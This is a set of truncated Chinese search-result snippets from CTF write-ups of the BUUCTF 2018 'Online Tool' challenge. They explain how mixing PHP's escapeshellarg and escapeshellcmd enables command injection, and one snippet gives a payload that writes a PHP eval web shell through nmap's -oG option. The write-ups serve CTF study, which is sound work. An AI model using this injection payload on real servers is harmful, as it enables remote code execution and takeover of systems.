HTTP_X_FORWARDED_FOR和REMOTE_ADDR都是服务器用来获取ip用的,在本题没有太大作用。后面的代码里需要host传参,再经过下面两个函数的处理,最后拼接字符串执行system系统函数,mkdir函数创建新目录。 这里找到几个网站,关于escapeshellarg和escapeshellcmd函数的漏洞介绍: https://paper.seebug.org/164/ https://www.anqu...
题目链接:[BUUCTF 2018]Online Tool。 打开环境,如下所示。 直接得到源码,如下。 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $...
BUU[BUUCTF 2018]Online Tool https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool 这道题都是没见过的,当是拓展知识了,主要考察了escapeshellarg()函数和escapeshellcmd()这两个函数混用产生的安全隐患。 以及对nmap指令参数的了解 CVE-2016-10045,补丁在PHPMailer 5.2.20中被发布。 源代码: <?php if ...
1.传入的参数是:172.17.0.2' -v -d a=12.经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。3.经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转...
[BUUCTF 2018]Online Tool nmap 的 -oG 参数项 escapeshellarg() 和 escapeshellcmd() 的绕过方法:单引号( ' ) payload:?host='<?php eval($_POST[123]);?> -oG 1.php%20 在网站前端得到一段 md5 值是文件夹地址名 蚁剑连接xxx/7fff22a1d06d6a44cdf617546029cd7e/1.php,根目录下得到flag ...
打开一看,发现给了一大串代码,接下来进行审计 if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } //首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用的这里没什么用 ...
首先sanbox会生成一个目录,但是不影响后续操作。 然后host经过escapeshellarg和escapeshellcmd校验,需要绕过。 查了下发现这两个函数一起用会有漏洞,导致单引号无法被成功转义可以进行命令注入。利用条件如下: 1、shell语句(注意引号前后均有空格):' shell '
[BUUCTF 2018]Online Tool 1 [BUUCTF 2018]Online Tool1 查看代码,题目本意是用户输入ip地址,执行nmap扫描 <?phpif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])){highlight_file(__FILE__);}else{$host=$...
BUUCTF 2018 - Online Tool 代码审计 php BUUCTF tcl 看着有复现,于是记笔记,学习一下这道题: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else ...
[BUUCTF 2018]Online Tool: 考察知识点:escapeshellcmd+escapeshellarg,和对Nmap的使用,nmap -oG可以将扫描结果和命令写入文件总; [GKCTF2020]cve版签到: 考察get_headers()漏洞的利用:PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者...